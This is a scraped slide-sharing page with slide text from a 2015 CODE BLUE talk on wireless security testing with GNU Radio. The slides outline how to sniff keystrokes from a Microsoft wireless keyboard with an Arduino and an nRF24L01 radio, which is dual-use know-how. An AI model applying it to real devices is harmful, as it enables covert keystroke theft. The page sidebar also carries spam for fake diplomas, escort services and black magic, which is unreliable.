[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo PupilloCODE BLUE
 
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫CODE BLUE
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...CODE BLUE
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka CODE BLUE
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...CODE BLUE
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...CODE BLUE
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...CODE BLUE
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...CODE BLUE
 
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也CODE BLUE
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...CODE BLUE
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...CODE BLUE
 

More from CODE BLUE (20)

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
 
[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl
 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
 
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
 
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
 

Recently uploaded

NO1 Qualified Best Black Magic Specialist Near Me Spiritual Healer Powerful L...
NO1 Qualified Best Black Magic Specialist Near Me Spiritual Healer Powerful L...NO1 Qualified Best Black Magic Specialist Near Me Spiritual Healer Powerful L...
NO1 Qualified Best Black Magic Specialist Near Me Spiritual Healer Powerful L...Amil baba
 
NO1 Certified Black Magic Specialist Expert Amil baba in Uk England Northern ...
NO1 Certified Black Magic Specialist Expert Amil baba in Uk England Northern ...NO1 Certified Black Magic Specialist Expert Amil baba in Uk England Northern ...
NO1 Certified Black Magic Specialist Expert Amil baba in Uk England Northern ...Amil Baba Dawood bangali
 
专业一比一美国旧金山艺术学院毕业证成绩单pdf电子版制作修改#真实工艺展示#真实防伪#diploma#degree
专业一比一美国旧金山艺术学院毕业证成绩单pdf电子版制作修改#真实工艺展示#真实防伪#diploma#degree专业一比一美国旧金山艺术学院毕业证成绩单pdf电子版制作修改#真实工艺展示#真实防伪#diploma#degree
专业一比一美国旧金山艺术学院毕业证成绩单pdf电子版制作修改#真实工艺展示#真实防伪#diploma#degreeyuu sss
 
美国IUB学位证,印第安纳大学伯明顿分校毕业证书1:1制作
美国IUB学位证,印第安纳大学伯明顿分校毕业证书1:1制作美国IUB学位证,印第安纳大学伯明顿分校毕业证书1:1制作
美国IUB学位证,印第安纳大学伯明顿分校毕业证书1:1制作ss846v0c
 
Erfurt FH学位证,埃尔福特应用技术大学毕业证书1:1制作
Erfurt FH学位证,埃尔福特应用技术大学毕业证书1:1制作Erfurt FH学位证,埃尔福特应用技术大学毕业证书1:1制作
Erfurt FH学位证,埃尔福特应用技术大学毕业证书1:1制作f3774p8b
 
Real Sure (Call Girl) in I.G.I. Airport 8377087607 Hot Call Girls In Delhi NCR
Real Sure (Call Girl) in I.G.I. Airport 8377087607 Hot Call Girls In Delhi NCRReal Sure (Call Girl) in I.G.I. Airport 8377087607 Hot Call Girls In Delhi NCR
Real Sure (Call Girl) in I.G.I. Airport 8377087607 Hot Call Girls In Delhi NCRdollysharma2066
 
办理(CSU毕业证书)澳洲查理斯特大学毕业证成绩单原版一比一
办理(CSU毕业证书)澳洲查理斯特大学毕业证成绩单原版一比一办理(CSU毕业证书)澳洲查理斯特大学毕业证成绩单原版一比一
办理(CSU毕业证书)澳洲查理斯特大学毕业证成绩单原版一比一diploma 1
 
the cOMPUTER SYSTEM - computer hardware servicing.pptx
the cOMPUTER SYSTEM - computer hardware servicing.pptxthe cOMPUTER SYSTEM - computer hardware servicing.pptx
the cOMPUTER SYSTEM - computer hardware servicing.pptxLeaMaePahinagGarciaV
 
RBS学位证,鹿特丹商学院毕业证书1:1制作
RBS学位证,鹿特丹商学院毕业证书1:1制作RBS学位证,鹿特丹商学院毕业证书1:1制作
RBS学位证,鹿特丹商学院毕业证书1:1制作f3774p8b
 
5S - House keeping (Seiri, Seiton, Seiso, Seiketsu, Shitsuke)
5S - House keeping (Seiri, Seiton, Seiso, Seiketsu, Shitsuke)5S - House keeping (Seiri, Seiton, Seiso, Seiketsu, Shitsuke)
5S - House keeping (Seiri, Seiton, Seiso, Seiketsu, Shitsuke)861c7ca49a02
 
1:1原版定制美国加州州立大学东湾分校毕业证成绩单pdf电子版制作修改#真实留信入库#永久存档#真实可查#diploma#degree
1:1原版定制美国加州州立大学东湾分校毕业证成绩单pdf电子版制作修改#真实留信入库#永久存档#真实可查#diploma#degree1:1原版定制美国加州州立大学东湾分校毕业证成绩单pdf电子版制作修改#真实留信入库#永久存档#真实可查#diploma#degree
1:1原版定制美国加州州立大学东湾分校毕业证成绩单pdf电子版制作修改#真实留信入库#永久存档#真实可查#diploma#degreeyuu sss
 
Dubai Call Girls O525547819 Spring Break Fast Call Girls Dubai
Dubai Call Girls O525547819 Spring Break Fast Call Girls DubaiDubai Call Girls O525547819 Spring Break Fast Call Girls Dubai
Dubai Call Girls O525547819 Spring Break Fast Call Girls Dubaikojalkojal131
 
Hindu amil baba kala jadu expert in pakistan islamabad lahore karachi atar ...
Hindu amil baba kala jadu expert  in pakistan islamabad lahore karachi atar  ...Hindu amil baba kala jadu expert  in pakistan islamabad lahore karachi atar  ...
Hindu amil baba kala jadu expert in pakistan islamabad lahore karachi atar ...amilabibi1
 
NO1 Certified Black Magic Specialist Expert In Bahawalpur, Sargodha, Sialkot,...
NO1 Certified Black Magic Specialist Expert In Bahawalpur, Sargodha, Sialkot,...NO1 Certified Black Magic Specialist Expert In Bahawalpur, Sargodha, Sialkot,...
NO1 Certified Black Magic Specialist Expert In Bahawalpur, Sargodha, Sialkot,...Amil Baba Dawood bangali
 
Hifi Babe North Delhi Call Girl Service Fun Tonight
Hifi Babe North Delhi Call Girl Service Fun TonightHifi Babe North Delhi Call Girl Service Fun Tonight
Hifi Babe North Delhi Call Girl Service Fun TonightKomal Khan
 
毕业文凭制作#回国入职#diploma#degree美国威斯康星大学麦迪逊分校毕业证成绩单pdf电子版制作修改#毕业文凭制作#回国入职#diploma#d...
毕业文凭制作#回国入职#diploma#degree美国威斯康星大学麦迪逊分校毕业证成绩单pdf电子版制作修改#毕业文凭制作#回国入职#diploma#d...毕业文凭制作#回国入职#diploma#degree美国威斯康星大学麦迪逊分校毕业证成绩单pdf电子版制作修改#毕业文凭制作#回国入职#diploma#d...
毕业文凭制作#回国入职#diploma#degree美国威斯康星大学麦迪逊分校毕业证成绩单pdf电子版制作修改#毕业文凭制作#回国入职#diploma#d...ttt fff
 
萨斯喀彻温大学毕业证学位证成绩单-购买流程
萨斯喀彻温大学毕业证学位证成绩单-购买流程萨斯喀彻温大学毕业证学位证成绩单-购买流程
萨斯喀彻温大学毕业证学位证成绩单-购买流程1k98h0e1
 
专业一比一美国加州州立大学东湾分校毕业证成绩单pdf电子版制作修改#真实工艺展示#真实防伪#diploma#degree
专业一比一美国加州州立大学东湾分校毕业证成绩单pdf电子版制作修改#真实工艺展示#真实防伪#diploma#degree专业一比一美国加州州立大学东湾分校毕业证成绩单pdf电子版制作修改#真实工艺展示#真实防伪#diploma#degree
专业一比一美国加州州立大学东湾分校毕业证成绩单pdf电子版制作修改#真实工艺展示#真实防伪#diploma#degreeyuu sss
 

Recently uploaded (20)

young call girls in Khanpur,🔝 9953056974 🔝 escort Service
young call girls in  Khanpur,🔝 9953056974 🔝 escort Serviceyoung call girls in  Khanpur,🔝 9953056974 🔝 escort Service
young call girls in Khanpur,🔝 9953056974 🔝 escort Service
 
NO1 Qualified Best Black Magic Specialist Near Me Spiritual Healer Powerful L...
NO1 Qualified Best Black Magic Specialist Near Me Spiritual Healer Powerful L...NO1 Qualified Best Black Magic Specialist Near Me Spiritual Healer Powerful L...
NO1 Qualified Best Black Magic Specialist Near Me Spiritual Healer Powerful L...
 
NO1 Certified Black Magic Specialist Expert Amil baba in Uk England Northern ...
NO1 Certified Black Magic Specialist Expert Amil baba in Uk England Northern ...NO1 Certified Black Magic Specialist Expert Amil baba in Uk England Northern ...
NO1 Certified Black Magic Specialist Expert Amil baba in Uk England Northern ...
 
专业一比一美国旧金山艺术学院毕业证成绩单pdf电子版制作修改#真实工艺展示#真实防伪#diploma#degree
专业一比一美国旧金山艺术学院毕业证成绩单pdf电子版制作修改#真实工艺展示#真实防伪#diploma#degree专业一比一美国旧金山艺术学院毕业证成绩单pdf电子版制作修改#真实工艺展示#真实防伪#diploma#degree
专业一比一美国旧金山艺术学院毕业证成绩单pdf电子版制作修改#真实工艺展示#真实防伪#diploma#degree
 
美国IUB学位证,印第安纳大学伯明顿分校毕业证书1:1制作
美国IUB学位证,印第安纳大学伯明顿分校毕业证书1:1制作美国IUB学位证,印第安纳大学伯明顿分校毕业证书1:1制作
美国IUB学位证,印第安纳大学伯明顿分校毕业证书1:1制作
 
Erfurt FH学位证,埃尔福特应用技术大学毕业证书1:1制作
Erfurt FH学位证,埃尔福特应用技术大学毕业证书1:1制作Erfurt FH学位证,埃尔福特应用技术大学毕业证书1:1制作
Erfurt FH学位证,埃尔福特应用技术大学毕业证书1:1制作
 
Real Sure (Call Girl) in I.G.I. Airport 8377087607 Hot Call Girls In Delhi NCR
Real Sure (Call Girl) in I.G.I. Airport 8377087607 Hot Call Girls In Delhi NCRReal Sure (Call Girl) in I.G.I. Airport 8377087607 Hot Call Girls In Delhi NCR
Real Sure (Call Girl) in I.G.I. Airport 8377087607 Hot Call Girls In Delhi NCR
 
办理(CSU毕业证书)澳洲查理斯特大学毕业证成绩单原版一比一
办理(CSU毕业证书)澳洲查理斯特大学毕业证成绩单原版一比一办理(CSU毕业证书)澳洲查理斯特大学毕业证成绩单原版一比一
办理(CSU毕业证书)澳洲查理斯特大学毕业证成绩单原版一比一
 
the cOMPUTER SYSTEM - computer hardware servicing.pptx
the cOMPUTER SYSTEM - computer hardware servicing.pptxthe cOMPUTER SYSTEM - computer hardware servicing.pptx
the cOMPUTER SYSTEM - computer hardware servicing.pptx
 
RBS学位证,鹿特丹商学院毕业证书1:1制作
RBS学位证,鹿特丹商学院毕业证书1:1制作RBS学位证,鹿特丹商学院毕业证书1:1制作
RBS学位证,鹿特丹商学院毕业证书1:1制作
 
5S - House keeping (Seiri, Seiton, Seiso, Seiketsu, Shitsuke)
5S - House keeping (Seiri, Seiton, Seiso, Seiketsu, Shitsuke)5S - House keeping (Seiri, Seiton, Seiso, Seiketsu, Shitsuke)
5S - House keeping (Seiri, Seiton, Seiso, Seiketsu, Shitsuke)
 
1:1原版定制美国加州州立大学东湾分校毕业证成绩单pdf电子版制作修改#真实留信入库#永久存档#真实可查#diploma#degree
1:1原版定制美国加州州立大学东湾分校毕业证成绩单pdf电子版制作修改#真实留信入库#永久存档#真实可查#diploma#degree1:1原版定制美国加州州立大学东湾分校毕业证成绩单pdf电子版制作修改#真实留信入库#永久存档#真实可查#diploma#degree
1:1原版定制美国加州州立大学东湾分校毕业证成绩单pdf电子版制作修改#真实留信入库#永久存档#真实可查#diploma#degree
 
young call girls in Gtb Nagar,🔝 9953056974 🔝 escort Service
young call girls in Gtb Nagar,🔝 9953056974 🔝 escort Serviceyoung call girls in Gtb Nagar,🔝 9953056974 🔝 escort Service
young call girls in Gtb Nagar,🔝 9953056974 🔝 escort Service
 
Dubai Call Girls O525547819 Spring Break Fast Call Girls Dubai
Dubai Call Girls O525547819 Spring Break Fast Call Girls DubaiDubai Call Girls O525547819 Spring Break Fast Call Girls Dubai
Dubai Call Girls O525547819 Spring Break Fast Call Girls Dubai
 
Hindu amil baba kala jadu expert in pakistan islamabad lahore karachi atar ...
Hindu amil baba kala jadu expert  in pakistan islamabad lahore karachi atar  ...Hindu amil baba kala jadu expert  in pakistan islamabad lahore karachi atar  ...
Hindu amil baba kala jadu expert in pakistan islamabad lahore karachi atar ...
 
NO1 Certified Black Magic Specialist Expert In Bahawalpur, Sargodha, Sialkot,...
NO1 Certified Black Magic Specialist Expert In Bahawalpur, Sargodha, Sialkot,...NO1 Certified Black Magic Specialist Expert In Bahawalpur, Sargodha, Sialkot,...
NO1 Certified Black Magic Specialist Expert In Bahawalpur, Sargodha, Sialkot,...
 
Hifi Babe North Delhi Call Girl Service Fun Tonight
Hifi Babe North Delhi Call Girl Service Fun TonightHifi Babe North Delhi Call Girl Service Fun Tonight
Hifi Babe North Delhi Call Girl Service Fun Tonight
 
毕业文凭制作#回国入职#diploma#degree美国威斯康星大学麦迪逊分校毕业证成绩单pdf电子版制作修改#毕业文凭制作#回国入职#diploma#d...
毕业文凭制作#回国入职#diploma#degree美国威斯康星大学麦迪逊分校毕业证成绩单pdf电子版制作修改#毕业文凭制作#回国入职#diploma#d...毕业文凭制作#回国入职#diploma#degree美国威斯康星大学麦迪逊分校毕业证成绩单pdf电子版制作修改#毕业文凭制作#回国入职#diploma#d...
毕业文凭制作#回国入职#diploma#degree美国威斯康星大学麦迪逊分校毕业证成绩单pdf电子版制作修改#毕业文凭制作#回国入职#diploma#d...
 
萨斯喀彻温大学毕业证学位证成绩单-购买流程
萨斯喀彻温大学毕业证学位证成绩单-购买流程萨斯喀彻温大学毕业证学位证成绩单-购买流程
萨斯喀彻温大学毕业证学位证成绩单-购买流程
 
专业一比一美国加州州立大学东湾分校毕业证成绩单pdf电子版制作修改#真实工艺展示#真实防伪#diploma#degree
专业一比一美国加州州立大学东湾分校毕业证成绩单pdf电子版制作修改#真实工艺展示#真实防伪#diploma#degree专业一比一美国加州州立大学东湾分校毕业证成绩单pdf电子版制作修改#真实工艺展示#真实防伪#diploma#degree
专业一比一美国加州州立大学东湾分校毕业证成绩单pdf电子版制作修改#真实工艺展示#真实防伪#diploma#degree
 

Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015

  • 1. Keiichi Horiai Fujitsu System Integration LABs. CODE BLUE 2015 Wireless security testing with attack
  • 2. Agenda  Circumstance  In the IoT (Internet of Things) era • key : Wireless Security • To analyze wireless security, SDR ( Software Defined Radio) technology is effective.  Introduce GNU Radio, a SDR tool  Powerful tool to test wireless security  Easily available, work with inexpensive peripheral hardware  Wireless security testing with attack  Attack#1 Key logging wireless keyboard  Attack#2 The replay attack for ADS-B2
  • 3. Recent release of wireless security  Abuse/Falsification of software and firmware  Drone attack by malware and network • http://www.slideshare.net/codeblue_jp/cb14-dongcheol-hongja/  RF signal level interception/injection  SPREAD SPECTRUM SATCOM HACKING: ATTACKING THE GLOBALSTAR SIMPLEX DATA SERVICE • https://www.blackhat.com/docs/us-15/materials/us-15-Moore- Spread-Spectrum-Satcom-Hacking-Attacking-The-GlobalStar- Simplex-Data-Service.pdf  Low-cost GPS simulator – GPS spoofing by SDR • Lin Huang, Qing Yang, DEFCON23 • https://media.defcon.org/DEF%20CON%2023/DEF%20CON %2023%20presentations/Lin%20Huang%20&%20Qing %20Yang/DEFCON-23-Lin-Huang-Qing-Yang-GPS-Spoofing.pdf   3
  • 4.  In 2001, Eric Blossom in US started a free & open-source software development toolkit about radio.  Multi-platform (Linux/FreeBSD/OSX/Windows)  Run on personal computer. cf. Many software radio technology run on FPGA on exclusive hardware.  Create flow graph to use GUI on GNURadio Companion  flow graph -> XML file -> Python -> C++  License GPL ver3 http://gnuradio.org/redmine/projects/gnuradio/wiki About GNURadio 4
  • 5. GNURadio Component  Elements of the flow graph SOURCE BLOCK SINK Software or Hardware Software   Python C++ Software or Hardware Input OutputProcessing 5
  • 6. Sources  Software Waveform generation (Sin, Cos, Triangle, Sawtooth, Square ) Various noise File  Hardware PC Audio Other peripheral hardware •RTL-SDR, HackRF, BladeRF, USRP 6
  • 7. Blocks  Operator(Logical, Bytes, Integer, Real, Complex...)  Constant, Variable(slider), Type conversion  Calculation (add, sub, multiple, div, Log, RMS, integral...)  Filter(LowPass, HighPass, BandPass, Reject, FFT, Hilbert, IIR, Decimation...)  Modulation and demodulation ( AM, FM, FSK, PSK, QAM, OFDM…)  Level control (AGC, Mute, Squelch, Moving average...)  Network (TCP, UDP, Socket...)  and more 7
  • 8. Sinks  Software  Hardware  PC Audio  Other peripheral hardware • HackRF, BladeRF, USRP, ... etc. SCOPE FFT Water Fall Histogram Constellation Plot Other Files 8
  • 9. Peripheral hardware (e.g.)   RTL-SDR HackRF BladeRF USRP Frequency range [MHz] 24-1800 1-6000 300-3800 70-6000 A/D convert bits 8 8 12 12 Band range [MHz] 2.8 20 28 56 Transfer / Receive RX Tx | Rx Tx & Rx Tx & Rx Price $20 $300 $420 $675 9
  • 11. VHF receiver  A VHF receiver composed of RTL-SDR and GNU Radio RTL-SDR 11
  • 12. ISM 2.4GHz band  WiFi/Bluetooth frequency allocation http://www.digikey.com/es/articles/techzone/2013/jun/shaping-the-wireless-future-with-low-energy-applications-and-systems 12
  • 13. ISM 2.4GHz band monitoring (e.g.) HackRF 13
  • 14. Attack wireless devices  Survey attack target Search FCC ID in FCC site Photos, someone else put on view? Overhaul by myself  Necessary information RF chip data sheet •Frequency band, Modulation, Transmission speed, Data format  Observe and analyze the signal 14
  • 16. How to monitoring and analyzing the signal  Receive radio waves  Check the signal : GNU Radio, SDR#  Write the received signal to file : GNU Radio, rtl_sdr  Analyze  Monitoring the waveform in detail : baudline  Cut the area where you need ( The area selected and write to file ) : baudline  Demodulation: GNU Radio | in-house scripts  Decode / Parse / Decrypt • Convert to bits (0/1) ( Hex dump is unreadable ) • Find the characterized bit pattern 16
  • 17. Signal monitoring tool  Baudline Baudline is the signal time-frequency visualization and analysis support tool Requirements • Linux(x86_64,PowerPC) • Mac OS X • Solaris SPARC Select the area and write to file http://www.baudline.com/index.html17
  • 19. Attack demo #1  Keylogger for Microsoft wireless keyboard 800 At first, try to reproduce “keysweeper”(*1) It can’t work the MS Wireless Keyboard 800 Japanese edition Demonstrate process from investigate the cause using the GNU Radio to work (*1) https://github.com/samyk/keysweeper 19
  • 20. Keylogger for Wireless Keyboard  27MH z band It is easy to snoop because (in)secure End of sale in the 2000s  2.4GHz band Same as Bluetooth/WiFi frequency Bluetooth specification is secure? What about the proprietary specification keyboard? 20
  • 21. Relation Project  Travis Goodspeed, 2010  The GoodFET is an open-source JTAG adapter, loosely based upon the TI MSP430 FET UIF and EZ430U boards  http://goodfet.sourceforge.net/  KeyKeriKi Project (CanSecWest 2010)  Developed some device with ARM Cortex MPU and radio module which can keyboard sniffing and remote command execution.  http://www.remote-exploit.org/articles/keykeriki_v2_0__8211_2_4ghz/index.html  Keysweeper (January 2015)  Make efficient and systematize processes • Focus on a part of device address fixed 0xCD • Embedded in USB charger and logging to EEPROM • Detect keyword and mobile module send SMS • Forward keystroke to another device in real time ... etc.  https://github.com/samyk/keysweeper 21
  • 22. Experiment on breadboard Sniffer hardware USB control PC Microsoft Wireless Keyboard 800 Arduino nano •Scan 2403-2480MHz by 1MHz step •Inspect 1 byte (=0xCD) in device ID •If next 2byte are (0x0A38 | 0x0A78), stop scanning and start logging about 1500 lines Arduino program nRF24L01 ・ 2.4GHz ISM band ・ GFSK modulation ・ 1Mbps or 2Mbps 22
  • 23. Success ? Radio setup End radio setup scan Tuning to 2480 Potential keyboard: AA AA 5A A9 CD 27 55 49 Tuning to 2403 Tuning to 2404 Potential keyboard: E4 AA AA A5 CD 55 A5 5A Tuning to 2405 Tuning to 2406 Tuning to 2407 Tuning to 2408 ………………… No !! 23
  • 25. Baudline (cut the area) 25
  • 26. Demodulation - 50 - 40 - 30 - 20 - 10 0 10 20 30 40 50 1 51 101 151 201 251 301 - 50 - 40 - 30 - 20 - 10 0 10 20 30 40 50 1 51 101 151 201 251 301 I/Q Vfm Vfm = ( I ( dQ/dt) - Q ( dI/dt)) / (I ^2 + Q^2) preamble bit = Vfm > 0 ? 0:1bit 26
